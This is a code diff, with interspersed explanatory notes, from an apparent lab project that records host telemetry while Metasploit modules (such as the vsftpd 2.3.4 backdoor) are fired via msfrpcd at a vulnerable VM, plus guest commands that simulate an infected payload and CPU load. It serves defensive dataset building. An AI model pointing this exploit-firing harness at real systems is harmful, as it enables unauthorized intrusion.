+    action.add_argument("--archive", action="store_true",
+                        help="Move flagged tarballs to --archive-root + drop index rows")
+    p.add_argument("--json", action="store_true",
+                   help="Machine-readable output instead of summary")
+    args = p.parse_args(argv)
+
+    if not args.episodes_root.exists():
+        print(f"no episodes dir at {args.episodes_root}", file=sys.stderr)
+        return 2
+
+    selected_reasons = set(args.reason or _REASONS)
+
+    quals: list[EpisodeQuality] = []
+    for row, tar in walk_index(args.index, args.episodes_root):
+        if args.host and row["host_id"] != args.host:
+            continue
+        q = classify_episode(tar, row["host_id"], row["episode_id"])
+        # Only mark "fake" if at least one of the selected reasons hits.
+        q.reasons = [r for r in q.reasons if r in selected_reasons]
+        quals.append(q)
+
+    flagged = [q for q in quals if q.fake]
+    kept = [q for q in quals if not q.fake]
+
+    if args.json:
+        print(json.dumps({
+            "scanned": len(quals),
+            "flagged": len(flagged),
+            "kept": len(kept),
+            "by_reason": {
+                r: sum(1 for q in flagged if r in q.reasons) for r in _REASONS
+            },
+            "flagged_episodes": [
+                {
+                    "host": q.host_id,
+                    "episode": q.episode_id,
+                    "size_bytes": q.size_bytes,
+                    "reasons": q.reasons,
+                    "sample": q.sample_name,
+                    "module": q.module_name,
+                } for q in flagged
+            ],
+        }, indent=2))
+    else:
+        print(f"scanned: {len(quals)}  flagged: {len(flagged)}  kept: {len(kept)}")
+        if flagged:
+            print()
+            print(f"{'host':<14} {'episode':<28} {'size':>9} reasons")
+            for q in flagged:
+                print(f"{q.host_id:<14} {q.episode_id:<28} {q.size_bytes:>9}  "
+                      f"{','.join(q.reasons)}")
+        if not (args.delete or args.archive):
+            print()
+            print("dry-run only. Re-run with --archive (safer) or --delete.")
+
+    if args.delete or args.archive:
+        action = "delete" if args.delete else "archive"
+        apply_action(
+            quals,
+            action=action,
+            archive_root=args.archive_root,
+            index_path=args.index,
+        )
+        print(f"\n{action}d {len(flagged)} episodes")
+
+    return 0 if not flagged else 1
+
+
+if __name__ == "__main__":
+    sys.exit(main())
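
Editor's note on `tools/prune_episodes.py`: the `flat-cpu` signal turns cumulative jiffy counters into CPU% samples, buckets them by phase, and compares per-phase medians. A minimal worked sketch of that arithmetic on synthetic data, assuming a `clk_tck` of 100; `cpu_pct_series` and `median_spread` are hypothetical names, and the rows are made up for illustration.

```python
from __future__ import annotations

import statistics


def cpu_pct_series(rows: list[dict], clk_tck: int = 100) -> list[tuple[int, float]]:
    """Turn cumulative jiffy counters into (t_mono_ns, CPU%) samples."""
    out = []
    for prev, cur in zip(rows, rows[1:]):
        dt = (cur["t_mono_ns"] - prev["t_mono_ns"]) / 1e9
        if dt <= 0:
            continue
        djiff = (cur["cpu_user_jiffies"] + cur["cpu_sys_jiffies"]) - (
            prev["cpu_user_jiffies"] + prev["cpu_sys_jiffies"]
        )
        out.append((cur["t_mono_ns"], 100.0 * (djiff / clk_tck) / dt))
    return out


def median_spread(samples: list[tuple[int, float]], labels: list[dict]) -> float:
    """Max minus min of per-phase median CPU%; 0.0 when there are no samples."""
    per_phase: dict[str, list[float]] = {}
    for t_ns, pct in samples:
        phase = "(pre)"
        for lbl in labels:  # labels are assumed sorted by t_mono_ns
            if lbl["t_mono_ns"] <= t_ns:
                phase = lbl["phase"]
            else:
                break
        per_phase.setdefault(phase, []).append(pct)
    medians = [statistics.median(v) for v in per_phase.values()]
    return max(medians) - min(medians) if medians else 0.0


if __name__ == "__main__":
    # One sample per second: 10 jiffies/s while clean, 90 jiffies/s after.
    jiffies = [0, 10, 20, 110, 200]
    rows = [
        {"t_mono_ns": i * 10**9, "cpu_user_jiffies": j, "cpu_sys_jiffies": 0}
        for i, j in enumerate(jiffies)
    ]
    labels = [
        {"t_mono_ns": 0, "phase": "clean"},
        {"t_mono_ns": 2_500_000_000, "phase": "infected"},
    ]
    spread = median_spread(cpu_pct_series(rows), labels)
    # About 80 points here, far above the 5-point threshold, so not flat.
    print(round(spread, 1), spread < 5.0)
```

Medians rather than means keep a single boot-time spike from hiding an otherwise flat episode.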
--- a/tools/run_fleet.py
+++ b/tools/run_fleet.py
@ -0,0 +1,109 @@
+"""``cis490-fleet`` — run as many concurrent labeled episodes as the
+host can handle, drawing samples from the manifest.
+
+Modes:
+
+  --capacity     Print the resource calculation and exit. No VMs spawned.
+  --waves N      Run N waves of episodes (one wave = max_concurrent
+                 episodes, each in its own slot). Default: 1.
+  --max-concurrent N
+                 Cap concurrency below the auto-detected ceiling.
+"""
+
+from __future__ import annotations
+
+import argparse
+import json
+import logging
+import os
+import signal
+import sys
+from pathlib import Path
+
+# Allow running as a script.
+sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
+
+from exploits.modules import load_module_configs  # noqa: E402
+from orchestrator.fleet import (  # noqa: E402
+    FleetConfig, FleetRunner, capacity_report, detect_capacity,
+)
+from samples.manifest import SampleManifest  # noqa: E402
+
+
+def main(argv: list[str] | None = None) -> int:
+    p = argparse.ArgumentParser(prog="cis490-fleet")
+    p.add_argument("--capacity", action="store_true")
+    p.add_argument("--waves", type=int, default=1)
+    p.add_argument("--max-concurrent", type=int, default=None)
+    p.add_argument("--manifest",
+                   default=str(Path(__file__).resolve().parent.parent / "samples" / "manifest.toml"))
+    p.add_argument("--modules-dir",
+                   default=str(Path(__file__).resolve().parent.parent / "exploits" / "modules"))
+    p.add_argument("--data-root", default="data")
+    p.add_argument("--host-id", default=os.environ.get("FLEET_HOST_ID") or os.uname().nodename)
+    p.add_argument("--ram-per-vm-mib", type=int, default=320)
+    p.add_argument("--require-real-samples", action="store_true")
+    p.add_argument("--force-tier2", action="store_true",
+                   help="Skip Tier 3 even when msfrpcd is reachable")
+    p.add_argument("--log-level", default="INFO")
+    args = p.parse_args(argv)
+
+    logging.basicConfig(
+        level=getattr(logging, args.log_level.upper(), logging.INFO),
+        format="%(asctime)s %(levelname)s %(name)s %(message)s",
+    )
+
+    if args.capacity:
+        print(capacity_report())
+        return 0
+
+    manifest = SampleManifest.load(args.manifest)
+    repo_root = Path(__file__).resolve().parent.parent
+    modules_dir = Path(args.modules_dir)
+    modules = load_module_configs(modules_dir) if modules_dir.exists() else {}
+
+    cfg = FleetConfig(
+        host_id=args.host_id,
+        repo_root=repo_root,
+        data_root=Path(args.data_root).resolve(),
+        manifest=manifest,
+        modules=modules,
+        ram_per_vm_mib=args.ram_per_vm_mib,
+        max_concurrent_override=args.max_concurrent,
+        require_real_samples=args.require_real_samples,
+        force_tier2=args.force_tier2,
+    )
+
+    runner = FleetRunner(cfg)
+
+    def _stop(signum, frame):  # noqa: ARG001
+        runner.stop()
+    signal.signal(signal.SIGTERM, _stop)
+    signal.signal(signal.SIGINT, _stop)
+
+    result = runner.run(episodes=args.waves)
+
+    print(json.dumps({
+        "host_id": args.host_id,
+        "capacity": result.capacity.to_dict(),
+        "modules_loaded": sorted(modules.keys()),
+        "slots": [
+            {
+                "slot": s.slot,
+                "sample": s.sample_name,
+                "sample_kind": s.sample_kind,
+                "tier": s.tier,
+                "module": s.module_name,
+                "rc": s.rc,
+                "duration_s": s.duration_s,
+                "error": s.error,
+            } for s in result.slots
+        ],
+        "total_duration_s": result.total_duration_s,
+    }, indent=2))
+
+    return 0 if all(s.rc == 0 for s in result.slots) else 1
+
+
+if __name__ == "__main__":
+    sys.exit(main())
--- a/tools/run_real_vm_demo.py
+++ b/tools/run_real_vm_demo.py
@ -27,7 +27,9 @@ from pathlib import Path
 sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
 sys.path.insert(0, str(Path(__file__).resolve().parent))

+from collectors import qmp  # noqa: E402
 from orchestrator.episode import EpisodeConfig, EpisodeRunner  # noqa: E402
+from samples.manifest import SampleManifest  # noqa: E402
 from vm_load_controller import VMLoadController  # noqa: E402
 from vm_serial import SerialClient  # noqa: E402

@ -69,7 +71,17 @@ def main() -> int:
    parser.add_argument("--interval-ms", type=int, default=100)
    parser.add_argument(
        "--run-dir",
-        default="/tmp/cis490-vm",
+        # Per-slot defaults so the fleet runner's parallel calls don't
+        # collide on the same /tmp dir (which would have rmtree'd each
+        # other's pidfiles mid-boot — see CIS490 history). Resolution
+        # order:
+        #   1) explicit --run-dir CLI flag
+        #   2) RUN_DIR env (set by the fleet runner)
+        #   3) /tmp/cis490-vm-<SLOT>  (SLOT defaults to 0)
+        default=(
+            os.environ.get("RUN_DIR")
+            or f"/tmp/cis490-vm-{os.environ.get('SLOT', '0')}"
+        ),
        help="QEMU run dir (sockets + pidfile go here)",
    )
    parser.add_argument(
@ -83,6 +95,16 @@ def main() -> int:
        default=120.0,
        help="how long to wait for serial login prompt",
    )
+    parser.add_argument(
+        "--sample",
+        default=os.environ.get("SAMPLE_NAME"),
+        help="Pick a workload profile from the manifest by name. Fleet runner "
+        "passes this via SAMPLE_NAME env. If unset, runs the v1 yes-loop.",
+    )
+    parser.add_argument(
+        "--manifest",
+        default=str(Path(__file__).resolve().parent.parent / "samples" / "manifest.toml"),
+    )
    args = parser.parse_args()

    logging.basicConfig(
@ -93,6 +115,17 @@ def main() -> int:

    repo_root = Path(__file__).resolve().parent.parent
    launcher = repo_root / "vm" / "launch_demo.sh"
+
+    # Resolve sample if requested.
+    sample = None
+    if args.sample:
+        manifest = SampleManifest.load(args.manifest)
+        sample = next((s for s in manifest.samples if s.name == args.sample), None)
+        if sample is None:
+            log.error("sample %r not in manifest %s", args.sample, args.manifest)
+            return 2
+        log.info("using sample=%s profile=%s kind=%s",
+                 sample.name, sample.profile, sample.kind)
    run_dir = Path(args.run_dir)
    # Wipe any stale sockets/pidfile from a previous run.
    if run_dir.exists():
@ -137,9 +170,42 @@ def main() -> int:
        serial.connect()
        serial.login(boot_timeout_s=args.boot_timeout)

-        controller = VMLoadController(serial)
+        # Take a savevm AFTER the guest is fully up but BEFORE we
+        # start any workload. EpisodeConfig.revert_at_{start,end} use
+        # this snapshot for inter-episode reverts (the snapshot lives
+        # in the qcow2's per-VM-process overlay since launch_demo.sh
+        # runs with snapshot=on, so it's discarded with the VM).
+        # Without this step, loadvm would target a snapshot that
+        # doesn't exist and silently emit snapshot_revert_failed.
+        qmp_sock = run_dir / "qmp.sock"
+        if qmp_sock.exists():
+            try:
+                _qmp = qmp.QMPClient(qmp_sock)
+                _qmp.connect()
+                try:
+                    out = _qmp.savevm("baseline-v1")
+                    log.info("savevm baseline-v1 OK: %s", out.strip()[:160])
+                finally:
+                    _qmp.close()
+            except Exception as e:
+                log.warning("savevm failed; revert_at_start unusable: %s", e)
+
+        # Bind the controller to the runner's event log so workload
+        # success/failure shows up alongside phase_transition events.
+        # Sample also goes into EpisodeConfig below so meta.sample
+        # records what was supposed to run.
+        runner_for_emit = {"runner": None}
+        controller = VMLoadController(
+            serial,
+            sample=sample,
+            emit_event=lambda ev, **kw: (
+                runner_for_emit["runner"].emit_event(ev, **kw)
+                if runner_for_emit["runner"] else None
+            ),
+        )
        controller.setup()

+        agent_sock = run_dir / "agent.sock"
        cfg = EpisodeConfig(
            target_pid=qemu_pid,
            duration_s=sum(d for _, d in DEFAULT_SCHEDULE),
@ -148,9 +214,18 @@ def main() -> int:
            phase_schedule=DEFAULT_SCHEDULE,
            image_name="alpine-3.21-cloudinit",
            snapshot_name="baseline-v1",
+            qmp_socket=qmp_sock if qmp_sock.exists() else None,
+            guest_agent_socket=agent_sock if agent_sock.exists() else None,
+            bridge_iface=os.environ.get("BRIDGE") or None,
+            sample=sample,
        )

-        result = EpisodeRunner(cfg, on_phase=controller.set_phase).run()
+        runner = EpisodeRunner(cfg, on_phase=controller.set_phase)
+        # Connect the controller's event sink to the runner now that
+        # both exist. (Forward-reference closure pattern keeps the
+        # constructor argument order natural.)
+        runner_for_emit["runner"] = runner
+        result = runner.run()

        controller.teardown()
        serial.close()
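
Review note: the `--run-dir` default in this file resolves in three steps (explicit flag, then the `RUN_DIR` env var, then a per-slot path under `/tmp`). The precedence can be sketched as a standalone function. `resolve_run_dir` is a hypothetical helper written for illustration and is not part of the repo; it takes the environment as a plain dict so the behaviour can be checked without touching `os.environ`.

```python
from __future__ import annotations

import argparse


def resolve_run_dir(argv: list[str], environ: dict[str, str]) -> str:
    """Hypothetical helper mirroring the --run-dir default in the diff.

    Precedence: --run-dir flag > RUN_DIR env > /tmp/cis490-vm-<SLOT>.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--run-dir",
        default=(
            # An empty RUN_DIR is falsy, so it falls through to the slot path.
            environ.get("RUN_DIR")
            or f"/tmp/cis490-vm-{environ.get('SLOT', '0')}"
        ),
    )
    return parser.parse_args(argv).run_dir
```

Because the default is computed when the parser is built, the environment is read once per invocation, and an explicit `--run-dir` always overrides it.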
--- a/tools/run_tier3_demo.py
+++ b/tools/run_tier3_demo.py
@ -0,0 +1,300 @@
+"""Tier-3: real VM, real exploit, honest ``armed -> infecting`` transition.
+
+Boots the vulnerable target VM, drives an msfrpcd-fired exploit module
+against it, and lets the orchestrator's host /proc collector sample
+the qemu-system pid throughout. Compared to ``run_real_vm_demo.py``:
+the workload that crosses the ``armed -> infecting`` boundary is now
+generated by an actual exploit landing a session, not by a script in
+the guest.
+
+Prereqs:
+  - vm/images/<target>.qcow2 (e.g. Metasploitable2)
+  - msfrpcd running locally:
+        msfrpcd -P <password> -U msf -a 127.0.0.1 -p 55553
+  - ``msgpack`` python package installed (added to runtime deps)
+
+Run:
+    MSFRPC_PASSWORD=<pass> uv run python tools/run_tier3_demo.py \\
+        --module vsftpd_234_backdoor \\
+        --data-root data
+"""
+
+from __future__ import annotations
+
+import argparse
+import logging
+import os
+import signal
+import subprocess
+import sys
+import time
+from pathlib import Path
+
+# Allow running as a script.
+sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
+
+from collectors import qmp  # noqa: E402
+from exploits.driver import DriverConfig, MSFExploitDriver  # noqa: E402
+from exploits.modules import load_module_config  # noqa: E402
+from exploits.msfrpc import MSFRpcClient, MSFRpcConfig  # noqa: E402
+from orchestrator.episode import EpisodeConfig, EpisodeRunner  # noqa: E402
+from samples.manifest import SampleManifest  # noqa: E402
+
+
+# Same envelope shape as Tier 2 so plots are comparable. Slightly more
+# armed/infecting time because real exploit fire + session establishment
+# takes hundreds of ms to a few seconds.
+DEFAULT_SCHEDULE = [
+    ("clean",            10.0),
+    ("armed",             3.0),
+    ("infecting",         5.0),
+    ("infected_running", 25.0),
+    ("dormant",          15.0),
+    ("infected_running", 20.0),
+    ("dormant",           5.0),
+    ("clean",             5.0),
+]
+
+
+def _wait_for_path(path: Path, timeout_s: float) -> None:
+    deadline = time.monotonic() + timeout_s
+    while time.monotonic() < deadline:
+        if path.exists() and path.read_text().strip():
+            return
+        time.sleep(0.2)
+    raise TimeoutError(f"{path} missing or still empty after {timeout_s}s")
+
+
+def _wait_for_tcp(host: str, port: int, timeout_s: float) -> None:
+    import socket
+    deadline = time.monotonic() + timeout_s
+    last_err: Exception | None = None
+    while time.monotonic() < deadline:
+        try:
+            with socket.create_connection((host, port), timeout=1.0):
+                return
+        except OSError as e:
+            last_err = e
+            time.sleep(1.0)
+    raise TimeoutError(
+        f"target service {host}:{port} not reachable within {timeout_s}s "
+        f"(last: {last_err})"
+    )
+
+
+def main() -> int:
+    parser = argparse.ArgumentParser(prog="run_tier3_demo")
+    parser.add_argument("--data-root", default="data")
+    parser.add_argument("--interval-ms", type=int, default=100)
+    parser.add_argument(
+        "--module",
+        default="vsftpd_234_backdoor",
+        help="Module config name in exploits/modules/<name>.toml",
+    )
+    parser.add_argument(
+        "--target-ip",
+        default="127.0.0.1",
+        help="Address the exploit module sets RHOSTS to. With the SLIRP "
+        "launcher (default), the guest's vulnerable port is hostfwd'd to "
+        "loopback; on a host-only bridge, this is the guest's bridge IP.",
+    )
+    parser.add_argument(
+        "--target-port",
+        type=int,
+        default=21,
+        help="Probe port to wait on before firing the exploit",
+    )
+    parser.add_argument(
+        "--run-dir",
+        # Per-slot defaults so the fleet runner's parallel calls don't
+        # collide on the same /tmp dir. See run_real_vm_demo.py for
+        # the same fix.
+        default=(
+            os.environ.get("RUN_DIR")
+            or f"/tmp/cis490-target-{os.environ.get('SLOT', '0')}"
+        ),
+        help="QEMU run dir (sockets + pidfile)",
+    )
+    parser.add_argument(
+        "--msfrpc-host", default=os.environ.get("MSFRPC_HOST", "127.0.0.1"),
+    )
+    parser.add_argument(
+        "--msfrpc-port", type=int,
+        default=int(os.environ.get("MSFRPC_PORT", "55553")),
+    )
+    parser.add_argument(
+        "--msfrpc-user", default=os.environ.get("MSFRPC_USER", "msf"),
+    )
+    parser.add_argument(
+        "--keep-vm",
+        action="store_true",
+        help="leave the VM running after the episode finishes",
+    )
+    parser.add_argument(
+        "--target-boot-timeout",
+        type=float,
+        default=180.0,
+        help="how long to wait for the guest's vulnerable service to listen",
+    )
+    parser.add_argument(
+        "--sample",
+        default=os.environ.get("SAMPLE_NAME"),
+        help="Pick a workload profile from the manifest by name. Fleet runner "
+        "passes this via SAMPLE_NAME env. Without it, falls back to the v1 yes-loop.",
+    )
+    parser.add_argument(
+        "--manifest",
+        default=str(Path(__file__).resolve().parent.parent / "samples" / "manifest.toml"),
+    )
+    args = parser.parse_args()
+
+    logging.basicConfig(
+        level=logging.INFO,
+        format="%(asctime)s %(levelname)s %(name)s %(message)s",
+    )
+    log = logging.getLogger("cis490.run_tier3_demo")
+
+    msfrpc_password = os.environ.get("MSFRPC_PASSWORD")
+    if not msfrpc_password:
+        log.error("MSFRPC_PASSWORD env var must be set")
+        return 2
+
+    repo_root = Path(__file__).resolve().parent.parent
+    launcher = repo_root / "vm" / "launch_target.sh"
+    modules_dir = repo_root / "exploits" / "modules"
+    module_path = modules_dir / f"{args.module}.toml"
+    if not module_path.exists():
+        log.error("no module config at %s", module_path)
+        return 2
+
+    module = load_module_config(module_path)
+    log.info("module loaded: %s (%s)", module.name, module.module_path)
+
+    sample = None
+    if args.sample:
+        manifest = SampleManifest.load(args.manifest)
+        sample = next((s for s in manifest.samples if s.name == args.sample), None)
+        if sample is None:
+            log.error("sample %r not in manifest %s", args.sample, args.manifest)
+            return 2
+        log.info("sample=%s profile=%s kind=%s",
+                 sample.name, sample.profile, sample.kind)
+
+    run_dir = Path(args.run_dir)
+    if run_dir.exists():
+        import shutil
+        shutil.rmtree(run_dir)
+    run_dir.mkdir(parents=True, exist_ok=True)
+    pid_file = run_dir / "qemu.pid"
+
+    log.info("booting target VM via %s (RUN_DIR=%s)", launcher, run_dir)
+    env = os.environ.copy()
+    env["RUN_DIR"] = str(run_dir)
+    qemu = subprocess.Popen(
+        [str(launcher)],
+        cwd=str(repo_root),
+        env=env,
+        stdout=subprocess.DEVNULL,
+        stderr=subprocess.DEVNULL,
+        start_new_session=True,
+    )
+
+    try:
+        _wait_for_path(pid_file, timeout_s=15.0)
+        qemu_pid = int(pid_file.read_text().strip())
+        log.info("qemu pid = %d; waiting for service on %s:%d (timeout %.0fs)",
+                 qemu_pid, args.target_ip, args.target_port,
+                 args.target_boot_timeout)
+        _wait_for_tcp(args.target_ip, args.target_port, args.target_boot_timeout)
+        log.info("target service is up")
+
+        # Pre-exploit savevm so EpisodeConfig.revert_at_{start,end}
+        # has a known-good baseline to load. Best-effort — we still
+        # run the episode if savevm fails (just without revert
+        # support). See run_real_vm_demo.py for the same pattern.
+        qmp_sock = run_dir / "qmp.sock"
+        if qmp_sock.exists():
+            try:
+                _qmp = qmp.QMPClient(qmp_sock)
+                _qmp.connect()
+                try:
+                    out = _qmp.savevm("baseline-v1")
+                    log.info("savevm baseline-v1 OK: %s", out.strip()[:160])
+                finally:
+                    _qmp.close()
+            except Exception as e:
+                log.warning("savevm failed; revert_at_start unusable: %s", e)
+
+        client = MSFRpcClient(
+            MSFRpcConfig(
+                host=args.msfrpc_host,
+                port=args.msfrpc_port,
+                user=args.msfrpc_user,
+                password=msfrpc_password,
+            )
+        )
+
+        cfg = EpisodeConfig(
+            target_pid=qemu_pid,
+            duration_s=sum(d for _, d in DEFAULT_SCHEDULE),
+            interval_ms=args.interval_ms,
+            data_root=Path(args.data_root),
+            phase_schedule=DEFAULT_SCHEDULE,
+            image_name=module.name + "-target",
+            snapshot_name="baseline-v1",
+            sample=sample,
+            exploit_meta={
+                "framework": "metasploit",
+                "module": module.module_path,
+                "module_type": module.module_type,
+                "module_name": module.name,
+                "payload": module.payload_path,
+                "rport": module.options.get("RPORT"),
+                "rhost_template": module.options.get("RHOSTS"),
+            },
+        )
+        runner = EpisodeRunner(cfg)
+
+        driver = MSFExploitDriver(
+            client=client,
+            module=module,
+            cfg=DriverConfig(
+                target_ip=args.target_ip,
+                sample_store_root=repo_root / "samples" / "store",
+            ),
+            emit_event=runner.emit_event,
+            sample=sample,
+        )
+        runner.on_phase = driver.set_phase
+
+        driver.setup()
+        try:
+            result = runner.run()
+        finally:
+            driver.teardown()
+
+        print()
+        print(f"episode_id = {result.episode_id}")
+        print(f"path       = {result.episode_dir}")
+        print(f"rows_proc  = {result.rows_proc}")
+        print(f"phases     = {result.phases_observed}")
+        print(f"module     = {module.module_path}")
+        print()
+        print("To plot:")
+        print(f"  uv run python tools/plot_envelope.py {result.episode_dir}")
+        return 0
+    finally:
+        if not args.keep_vm:
+            log.info("shutting down VM (pid=%d)", qemu.pid)
+            try:
+                os.killpg(os.getpgid(qemu.pid), signal.SIGTERM)
+            except ProcessLookupError:
+                pass
+            try:
+                qemu.wait(timeout=5)
+            except subprocess.TimeoutExpired:
+                os.killpg(os.getpgid(qemu.pid), signal.SIGKILL)
+
+
+if __name__ == "__main__":
+    sys.exit(main())
--- a/tools/vm_load_controller.py
+++ b/tools/vm_load_controller.py
@ -22,21 +22,63 @@ fire and a real sample.
 from __future__ import annotations

 import logging
+import sys
+from pathlib import Path
+from typing import Callable

 from vm_serial import SerialClient

+# Allow running as a script (sibling of tools/).
+sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
+
+from exploits.workloads import Workload, workload_for  # noqa: E402
+from samples.manifest import Sample  # noqa: E402
+

 log = logging.getLogger("cis490.vm_load_controller")


+EmitEvent = Callable[..., None]
+
+
 class VMLoadController:
-    def __init__(self, serial: SerialClient) -> None:
+    """Drives a real Alpine guest through the phase schedule for
+    Tier 2 (no exploit). Workload is chosen by ``sample.profile`` —
+    same profile catalog as the Tier-3 driver so a fleet wave
+    produces matched envelopes whether or not an exploit fires.
+
+    Without a sample, falls back to the original cpu-saturate yes-loop
+    (the original Tier-2 demo behaviour).
+
+    Every set_phase call emits an event into the runner's events.jsonl
+    so we can audit (a) whether the workload command actually got
+    sent, (b) whether the guest acknowledged it, and (c) whether the
+    expected process is running afterwards. Without those events,
+    silent failures (partial login, command swallowed by the tty) produce
+    well-labeled but information-free episodes; see CIS490 history,
+    where every phase showed a median of 20% CPU on elliott-lab."""
+
+    def __init__(
+        self,
+        serial: SerialClient,
+        sample: Sample | None = None,
+        emit_event: EmitEvent | None = None,
+    ) -> None:
        self.s = serial
+        self.sample = sample
+        self.workload: Workload | None = workload_for(sample)
+        # No-op default so callers don't have to thread an emitter.
+        self.emit: EmitEvent = emit_event or (lambda *a, **kw: None)

    def setup(self) -> None:
        # Kill any pre-existing load and clear scratch space.
        self._kill_load()
        self.s.run("rm -f /tmp/payload /tmp/armed.log; echo setup-ok")
+        self.emit(
+            "workload_setup",
+            profile=self.workload.profile if self.workload else "v1-yes",
+            sample=self.sample.name if self.sample else None,
+        )

    def teardown(self) -> None:
        self._kill_load()
@ -44,29 +86,86 @@ class VMLoadController:
    # ---- phases ---------------------------------------------------------

    def set_phase(self, phase: str) -> None:
-        log.info("vm phase -> %s", phase)
-        if phase == "clean":
-            self._kill_load()
-        elif phase == "armed":
-            self.s.run("echo armed-handshake-$(date +%s) > /tmp/armed.log")
-        elif phase == "infecting":
-            self.s.run(
-                "dd if=/dev/urandom of=/tmp/payload bs=4k count=128 2>/dev/null && "
-                "chmod +x /tmp/payload"
+        log.info("vm phase -> %s (profile=%s)",
+                 phase, self.workload.profile if self.workload else "v1")
+        try:
+            if phase == "clean":
+                self._kill_load()
+                self._emit_phase("workload_killed", phase)
+            elif phase == "armed":
+                self.s.run("echo armed-handshake-$(date +%s) > /tmp/armed.log")
+                self._emit_phase("workload_armed", phase)
+            elif phase == "infecting":
+                self.s.run(
+                    "dd if=/dev/urandom of=/tmp/payload bs=4k count=128 2>/dev/null && "
+                    "chmod +x /tmp/payload"
+                )
+                self._emit_phase("workload_infecting", phase)
+            elif phase == "infected_running":
+                self._kill_load()
+                if self.workload is not None:
+                    self.s.run(self.workload.start_cmd)
+                else:
+                    self.s.run(
+                        "nohup sh -c 'yes > /dev/null' </dev/null >/dev/null 2>&1 & disown"
+                    )
+                self._emit_phase("workload_started", phase)
+            elif phase == "dormant":
+                # Probe BEFORE we kill so we see whether the workload
+                # was actually running. If the probe says nothing was
+                # running, the previous infected_running was a no-op
+                # and the trainer should filter this episode.
+                probe = self._probe()
+                self._kill_load()
+                self._emit_phase("workload_killed", phase, pre_kill_probe=probe)
+            else:
+                log.warning("unknown phase: %s", phase)
+        except Exception as e:
+            # Don't propagate — the runner already swallows on_phase
+            # exceptions. But DO record so the episode is filterable.
+            log.exception("set_phase(%s) failed", phase)
+            self.emit(
+                "workload_failed",
+                phase=phase,
+                error=str(e)[:200],
+                profile=self.workload.profile if self.workload else "v1-yes",
            )
-        elif phase == "infected_running":
-            self._kill_load()
-            # Background CPU burner. `nohup` + `&` + redirects to detach.
-            self.s.run(
-                "nohup sh -c 'yes > /dev/null' </dev/null >/dev/null 2>&1 & disown"
-            )
-        elif phase == "dormant":
-            self._kill_load()
-        else:
-            log.warning("unknown phase: %s", phase)

    # ---- internals ------------------------------------------------------

    def _kill_load(self) -> None:
-        # `true` at the end so the run() exit status is always 0.
+        if self.workload is not None:
+            self.s.run(self.workload.stop_cmd)
+        # Always sweep the v1 leftover commands too, in case we just
+        # switched profiles mid-fleet-run.
        self.s.run("pkill yes 2>/dev/null; pkill stress-ng 2>/dev/null; true")
+
+    def _probe(self) -> dict:
+        """Ask the guest what's actually running. Returns a small dict
+        the caller stamps into the event so trainers can detect the
+        "workload didn't fire" case from meta alone."""
+        try:
+            out = self.s.run(
+                "echo yes=$(pgrep yes 2>/dev/null | wc -l); "
+                "echo sh=$(pgrep sh 2>/dev/null | wc -l); "
+                "echo loadavg=$(awk '{print $1}' /proc/loadavg)"
+            )
+            stats: dict = {}
+            for line in out.splitlines():
+                line = line.strip()
+                if "=" not in line:
+                    continue
+                k, _, v = line.partition("=")
+                stats[k.strip()] = v.strip()
+            return stats
+        except Exception as e:
+            return {"probe_error": str(e)[:120]}
+
+    def _emit_phase(self, event: str, phase: str, **extra) -> None:
+        self.emit(
+            event,
+            phase=phase,
+            profile=self.workload.profile if self.workload else "v1-yes",
+            sample=self.sample.name if self.sample else None,
+            **extra,
+        )
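
Review note: `_probe` turns the guest's `key=value` lines into a dict that is stamped into the `workload_killed` event. A minimal sketch of that parsing step follows, run against made-up serial output. `parse_probe` and `yes_loop_was_running` are hypothetical names used only for illustration, and the second helper is meaningful only for the v1 yes-loop fallback, not for manifest profiles.

```python
from __future__ import annotations


def parse_probe(out: str) -> dict[str, str]:
    """Parse key=value lines; lines without '=' (e.g. a shell prompt) are skipped."""
    stats: dict[str, str] = {}
    for line in out.splitlines():
        line = line.strip()
        if "=" not in line:
            continue
        key, _, value = line.partition("=")
        stats[key.strip()] = value.strip()
    return stats


def yes_loop_was_running(stats: dict[str, str]) -> bool:
    """Hypothetical filter: True only if the probe counted at least one `yes`."""
    try:
        return int(stats.get("yes", "0")) > 0
    except ValueError:
        # Malformed count (or a probe_error-only dict): treat as not running.
        return False
```

A consumer of events.jsonl could apply a check like this to `pre_kill_probe` to drop episodes whose `infected_running` phase was a no-op.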
--- a/vm/guest-agent/cis490_agent.py
+++ b/vm/guest-agent/cis490_agent.py
@ -0,0 +1,274 @@
+#!/usr/bin/env python3
+"""In-guest telemetry agent — runs INSIDE the VM.
+
+Writes one JSON-lines row per tick to a virtio-serial port that the
+host has wired up as ``cis490.guest.agent``. The host-side collector
+(`collectors.guest_agent`) reads these rows and stamps them with the
+host's monotonic clock before persisting to ``telemetry-guest.jsonl``.
+
+Stdlib only — no `psutil`, no extra deps to bake into the guest. Every
+field is read from /proc on the guest, so this works on busybox-based
+Alpine, on Cirros, and on Metasploitable2 unchanged.
+
+Wire path inside the guest:
+    /dev/virtio-ports/cis490.guest.agent
+
+The host side opens the matching unix socket on the hypervisor.
+The protocol is intentionally trivial: the agent emits newline-
+delimited JSON; the host emits nothing back. One direction.
+
+This source is the **deployable** side — every row is tagged
+``available_in_deployment: true``. See docs/threat-model.md.
+"""
+
+from __future__ import annotations
+
+import argparse
+import json
+import os
+import platform
+import sys
+import time
+from typing import Any
+
+
+SOURCE = "guest_agent"
+AVAILABLE_IN_DEPLOYMENT = True
+DEFAULT_PORT = "/dev/virtio-ports/cis490.guest.agent"
+DEFAULT_INTERVAL_MS = 100  # 10 Hz
+DEFAULT_TOP_N = 8
+
+
+# ---------- /proc parsers ---------------------------------------------------
+
+
+def _read(path: str) -> str | None:
+    try:
+        with open(path, "rb") as f:
+            return f.read().decode("ascii", errors="replace")
+    except OSError:  # includes ProcessLookupError when a pid exits mid-read
+        return None
+
+
+def read_loadavg() -> tuple[float, float, float] | None:
+    text = _read("/proc/loadavg")
+    if text is None:
+        return None
+    parts = text.split()
+    return float(parts[0]), float(parts[1]), float(parts[2])
+
+
+def read_meminfo() -> dict[str, int]:
+    text = _read("/proc/meminfo")
+    out: dict[str, int] = {}
+    if text is None:
+        return out
+    for line in text.splitlines():
+        k, _, rest = line.partition(":")
+        v = rest.strip()
+        if v.endswith(" kB"):
+            try:
+                out[k] = int(v[:-3]) * 1024
+            except ValueError:
+                pass
+    return out
+
+
+def read_cpu_total() -> dict[str, int] | None:
